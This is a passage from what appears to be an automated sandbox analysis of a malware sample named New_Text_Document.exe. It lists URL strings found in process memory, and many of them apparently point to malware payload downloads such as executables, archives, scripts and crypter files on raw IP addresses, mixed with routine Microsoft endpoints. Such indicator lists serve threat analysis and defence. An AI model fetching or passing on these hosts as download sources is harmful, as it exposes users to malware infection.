                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ysbaojia.com/downfile.asp?sid=276663/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zhperviepixie.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zhperviepixie.com/sy22/
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zhperviepixie.com/sy22/www.completetip.com
                    Source: explorer.exe, 0000000C.00000003.2271432998.000000000C553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C556000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zhperviepixie.comReferer:
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x.233sy.cn/game/pc/lianzhanst.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://y.shavsl.com/gif
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000006002000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://yektakhodro.com/oqhk/?6V=7reSW0LkqgN1RwZqN6CxsDEv/5Yp8k7QpN9VGUz5XmbOUIotZrctGlff0kfis4OAuUZY
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yp.hnggzyjy.cn/Common/yz.vbs
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yzkzixun.com/v2x2vexx.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://z.shavsl.com/b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1ecosolution.it/new.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1qubed.com/de/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://209.145.51.44/RobluxCoins.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://529f38d0-3744-4286-b484-be860d475d25.usrfiles.com/ugd/529f38_27182d05f0a34cf98f51abce87b89dc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://529f38d0-3744-4286-b484-be860d475d25.usrfiles.com/ugd/529f38_6521c5ccbd8d46acb81ce3eb5cc3cc5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://529f38d0-3744-4286-b484-be860d475d25.usrfiles.com/ugd/529f38_b1a25e92f63143fbade8eec9de2446f
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff09
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://84.54.50.9/t.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/Q7/PeF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/Q7/QWER/PeF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/Q7/QWER/dllf3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/Q7/dllF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/QWERS/MASTERXLS/PeF3New.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/QWERS/MASTERXLS/dll.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/QWERS/NEW23/Pef3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/QWERS/NEW24/Pe03.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/QWERS/NEW24/dllF3.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://91.213.50.74/CRYPS/QWERS/NEW25/crypdas.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abissnet.net/se12y5vm.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abissnet.net/u0eukz.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://abmaxdigital.com/wp-content/uploads/2021/02/USBrowserInst.exe
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountingnj.blob.core.windows.net/test/Helper.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://acellr.co.uk/20201027-50207388.jar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://acesseinfo.com.br/opt/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://acrglobe.com/pi/
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.byte.in.ua/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.byte.in.ua/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.byte.in.ua/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agemn.co.za/zk58h95.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agriformexico.com/eo/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alakheilizwe.org/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alakheilizwe.org/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alakheilizwe.org/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alayyadcare.com/tmp/index.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aljassimaluminium.com/xerror/images/deleted/webcloudserverimagesteautodeletegroupscloudapi/C
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aljassimaluminium.com/xerror/images/deleted/webcloudserverimagesteautodeletegroupscloudapi/Y
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://almarsam.sa/ae/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alraeid.com/ip/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://altunminyum.github.io/07xr/gbdev.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://altunminyum.github.io/gf6kbeifmq6qr/pllekxf.bmp
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amarfoods.com/iu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ambjulio.com/a/08/150822/au/au
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ambjulio.com/a/08/150822/up/up
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anamurziraatodasi.org.tr/oiot/
                    Source: explorer.exe, 0000000C.00000002.2519047272.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2272914280.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1298597652.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.baimless.com/download/a.exe
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1298597652.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                    Source: explorer.exe, 0000000C.00000000.1291540704.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2502572191.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.net.bd/asim/
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aprfc.rw/nui/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aprfc.rw/nui/?90716141
                    Source: explorer.exe, 0000000C.00000002.2519047272.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1298597652.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005E70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
                    Source: explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                    Source: explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://athadnw.com/download/File_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atomm.com.br/.well-known/acme-challenge/bo/Oqalv.png
